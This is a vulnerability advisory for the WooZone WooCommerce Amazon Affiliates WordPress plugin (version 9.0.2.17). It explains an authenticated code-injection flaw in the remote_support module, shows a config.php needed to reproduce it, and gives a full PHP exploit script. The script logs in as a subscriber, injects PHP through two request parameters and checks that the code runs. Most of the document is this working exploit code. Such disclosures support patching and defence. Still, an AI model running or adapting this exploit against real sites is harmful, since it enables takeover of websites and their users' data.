WooZone - WooCommerce Amazon Affiliates [Authenticated Remote Code Execution]
This vulnerability is related to DWF-2017-87001, check WooZone - WooCommerce Amazon Affiliates [Arbitrary File Upload] for details.
Description
Further investigation by MattR revealed that the param $_REQUEST['WooZone-key']
can be used for code injection in modules/remote_support/remote_init.php
file. Checking this part of code I discovered that both this and the
$_REQUEST['WooZone-access_path'] are vulnerable to this attack.
In this case instead of first updating $_REQUEST['WooZone-key'] and then
using that key to update a file, we inject code in the vulnerable params
and the we request the woozone/modules/remote_support/remote_tunnel.php
file in order to execute the code.
PoC
The source files were provided by Brad from a hacked website. It seems
like remote_support module is missing config.php file. Without it
the module won’t load and this attack will fail. The contents of
config.php file should look like this:
<?php
echo json_encode(
array(
'remote_support' => array(
'version' => '1.0',
'menu' => array(
'order' => 20,
'show_in_menu' => true,
'title' => 'Remote support',
'icon' => 'images/16.png'
),
/*'in_dashboard' => array(
'icon' => 'images/32.png',
'url' => admin_url("admin.php?page=WooZone_remote_support")
),*/
'help' => array(
'type' => 'remote',
'url' => 'http://docs.aa-team.com/woocommerce-amazon-affiliates/documentation/price_select/'
),
'description' => "....",
'module_init' => 'init.php',
'load_in' => array(
'backend' => array(
'admin.php?page=WooZone_remote_support',
'admin-ajax.php'
),
'frontend' => false
),
'javascript' => array(
'admin',
'hashchange',
'tipsy',
'thickbox'
),
'css' => array(
'admin',
'tipsy'
)
)
)
);
Actual exploit:
#!/usr/bin/env php
<?php
/*******************************************************************************
* WooZone - WooCommerce Amazon Affiliates [Remote Code Execution]
*
* Exploit Author: Pan Vag <[email protected]>
* To install deps run `composer install`
******************************************************************************/
require_once 'vendor/autoload.php';
use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\Session;
use Wordfence\ExKit\WPAuthentication;
Config::get('url.base', null, true, 'Enter the site URL')
|| ExitCodes::exitWithFailedPrecondition('You must enter a valid URL');
$s = new Session();
$s->XDebugOn();
Cli::writeInfo('Authenticating...');
WPAuthentication::logInAsUserRole($s, WPAuthentication::USER_ROLE_SUBSCRIBER);
$vulnerableParams = ['WooZone-access_path', 'WooZone-key'];
foreach ( $vulnerableParams as $vulnerable_param ) {
Cli::writeInfo('Exploiting using $_REQUEST['.$vulnerable_param.'] param...');
$identifier = uniqid();
$postData = [
'action' => 'WooZoneRemoteSupportRequest',
'sub_actions' => 'access_details',
'params' => http_build_query([
'WooZone-allow_file_remote' => 'yes',
$vulnerable_param => '"); die("'.$identifier.'");/*'
]),
];
$r = $s->post(Endpoint::adminAjaxURL(), [], $postData);
$rJson = @json_decode($r->body);
if(!$r->success || !$rJson || !isset($rJson->status) || $rJson->status != 'valid'){
ExitCodes::exitWithFailed('Failed to exploit');
}
Cli::writeInfo('Validating exploit...');
$fileUrl = Endpoint::pluginsURL().'/woozone/modules/remote_support/remote_tunnel.php';
$r = Requests::get($fileUrl);
if(!$r->success || $r->body != $identifier){
Cli::writeError('Failed to validate exploitation through $_REQUEST['.$vulnerable_param.'] param');
} else {
Cli::writeSuccess('Successful exploitation using $_REQUEST['.$vulnerable_param.'] param');
}
}
ExitCodes::exitWithInformational('Exploitation attempt finished');
- 5 June 2017
- Pan Vagenas
- codecanyon.net
- WooZone - WooCommerce Amazon Affiliates
- 9.0.2.17
- WordPress 4.7.0
- DWF-2017-87014